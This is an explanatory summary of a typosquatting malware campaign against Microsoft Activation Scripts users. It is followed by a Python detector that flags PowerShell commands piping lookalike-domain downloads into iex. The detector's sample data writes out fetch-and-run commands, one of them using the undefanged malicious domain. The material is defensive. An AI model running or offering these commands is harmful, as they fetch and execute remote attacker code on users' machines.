This article details a recent malware campaign targeting users of the Microsoft Activation Scripts (MAS) project, an open-source tool for activating Windows and Office. Here’s a breakdown of the key information:
* The Scam: Attackers registered a domain one character away from the one in the official MAS instructions. Users who type the PowerShell activation command by hand and mistype "get.activated.win" as "get.activate[.]win" fetch and run the attacker's script instead of the real one, which installs the Cosmali Loader malware.
* The Malware: Cosmali Loader delivers cryptomining utilities and the XWorm remote access trojan (RAT). Critically, the malware's control panel is insecure, so anyone who finds it can potentially reach the infected computers.
* The Warning: Infected users are seeing pop-up warnings stating that they are infected with Cosmali Loader. The warnings advise a complete Windows reinstall.
* Origin of the Warnings: It is believed a security researcher gained access to the malware's control panel and used it to notify infected users.
* MAS Project: MAS is a legitimate open-source project hosted on GitHub, though Microsoft views it unfavorably.
* How it Works: The attackers rely on the single-character difference between the legitimate and malicious domain names, hoping that some users will make the typo.
In short, users of the MAS project are being targeted by a typosquatting campaign that delivers malware through a single-character typo. The recommended remedy for affected machines is a complete Windows reinstall.
Key Takeaways:
* Double-check URLs: Always verify the exact URL you are entering, especially for activation or software installation commands that pipe a download straight into PowerShell. Copying the command from the project's own documentation rather than retyping it removes the chance of a typo.
* Be wary of pop-up warnings: While the warnings in this case appear to have been genuine, do not act on pop-up messages without verifying their source.
* Understand the risks of unofficial activation tools: Using tools like MAS, while convenient, carries inherent risk, as they are not supported by Microsoft.
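The single-character lookalike described above, and the "double-check URLs" advice, can be turned into a mechanical check. The following Python is an added example, not code from the article or the MAS project: it takes PowerShell command lines (constructed samples, not real log captures), extracts any URL that is piped into `iex`, and flags hosts within a small edit distance of the official `get.activated.win` host. The allowlist, the distance threshold, the severity labels and the sample commands are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit

# Host used by the official MAS instructions (named in the article). Anything
# within a small edit distance of it is treated as a possible lookalike.
# The allowlist and threshold below are assumptions for this example.
ALLOWED_HOSTS = {"get.activated.win"}
MAX_LOOKALIKE_DISTANCE = 2

URL_RE = re.compile(r"https?://[^\s'\"|;)]+", re.IGNORECASE)
# "| iex" or "| Invoke-Expression": whatever the remote server returned gets executed.
PIPE_TO_IEX_RE = re.compile(r"\|\s*(iex|invoke-expression)\b", re.IGNORECASE)

# Constructed sample command lines, as they might appear in PowerShell
# script-block logs. These are illustrative, not real captures.
SAMPLE_COMMANDS = [
    "irm https://get.activated.win | iex",        # the genuine instruction
    "irm https://get.activate.win | iex",         # one character off: the case in the article
    "irm https://example.test/setup.ps1 | iex",   # remote code from an unrelated host
    "Get-Date",                                   # no remote fetch at all
]


def levenshtein(a: str, b: str) -> int:
    """Edit distance counting single-character insertions, deletions and substitutions."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete ca
                           cur[j - 1] + 1,         # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def classify_host(host: str, allowed=ALLOWED_HOSTS,
                  max_distance: int = MAX_LOOKALIKE_DISTANCE) -> str:
    """'allowed' for an exact match, 'lookalike' for a near miss, else 'unknown'."""
    host = host.lower().rstrip(".")
    if host in allowed:
        return "allowed"
    if any(levenshtein(host, good) <= max_distance for good in allowed):
        return "lookalike"
    return "unknown"


def check_command(cmd: str) -> dict:
    """Inspect one PowerShell command line for a remote script piped into iex."""
    hosts = [urlsplit(u).hostname or "" for u in URL_RE.findall(cmd)]
    pipes_to_iex = PIPE_TO_IEX_RE.search(cmd) is not None
    verdicts = {h: classify_host(h) for h in hosts}
    if not hosts or not pipes_to_iex:
        severity = "info"       # nothing fetched and executed
    elif "lookalike" in verdicts.values():
        severity = "block"      # near miss of a trusted host: the typosquat pattern
    elif all(v == "allowed" for v in verdicts.values()):
        severity = "allow"
    else:
        severity = "review"     # remote code from a host not on the allowlist
    return {"command": cmd, "hosts": verdicts, "severity": severity}


def scan(commands) -> list:
    """Run check_command over a batch of command lines."""
    return [check_command(c) for c in commands]


if __name__ == "__main__":
    for result in scan(SAMPLE_COMMANDS):
        print(f"{result['severity']:7} {result['hosts']}  <- {result['command']}")
```

The "lookalike" verdict is the one this campaign would trigger: `get.activate.win` is a single deletion away from `get.activated.win`. The same logic can be pointed at PowerShell script-block log events (event ID 4104) or at a pre-commit hook for runbooks; the distance threshold is a trade-off, since a larger value catches more typos but also more unrelated hosts.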